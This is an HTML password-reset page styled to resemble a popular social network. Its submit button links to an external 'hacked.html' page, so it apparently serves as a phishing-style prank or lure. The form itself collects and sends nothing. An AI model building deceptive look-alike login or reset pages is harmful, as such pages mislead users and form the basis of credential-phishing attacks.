<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Reset Password - Your Website</title>
  <style>
    body {
      font-family: 'Arial', sans-serif;
      background-color: #fafafa;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
    }

    .container {
      background-color: #fff;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      overflow: hidden;
      width: 300px;
      max-width: 100%;
      text-align: center;
      padding: 20px;
    }

    .logo {
      margin-bottom: 20px;
    }

    .logo img {
      width: 100px; /* Adjust the width to your preference */
      height: auto; /* Maintain the aspect ratio */
    }

    h1 {
      font-size: 24px;
      margin-bottom: 20px;
      color: #262626;
    }

    form {
      display: flex;
      flex-direction: column;
    }

    label {
      font-size: 14px;
      color: #262626;
      margin-bottom: 8px;
      text-align: left;
    }

    input {
      width: 100%;
      padding: 10px;
      margin-bottom: 20px;
      box-sizing: border-box;
      border: 1px solid #ddd;
      border-radius: 4px;
    }

    button {
      background-color: #3897f0;
      color: #fff;
      padding: 10px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      font-size: 16px;
    }

    button:hover {
      background-color: #3171b9;
    }

    .back-to-login {
      margin-top: 20px;
      font-size: 14px;
      color: #3897f0;
      cursor: pointer;
    }

    .back-to-login:hover {
      text-decoration: underline;
    }
    #btn-color {
	text-decoration: none;
	color: white;
    }
  </style>
</head>
<body>

  <div class="container">
    <div class="logo">
      <!-- Replace the src attribute with the path to your logo image -->
      <img src="https://cdn-icons-png.flaticon.com/512/3621/3621435.png" alt="Logo">
    </div>

    <h1>Reset Password</h1>

    <form>
      <label for="new-password">New Password:</label>
      <input type="password" id="new-password" name="new-password" required>

      <label for="confirm-password">Confirm Password:</label>
      <input type="password" id="confirm-password" name="confirm-password" required>

      <button type="submit"><a id="btn-color" href="https://shadnajmalddin2.github.io/pass/hacked.html">Reset Password</a></button>
    </form>

    <p class="back-to-login">Go back to your account</p>
  </div>

</body>
</html>
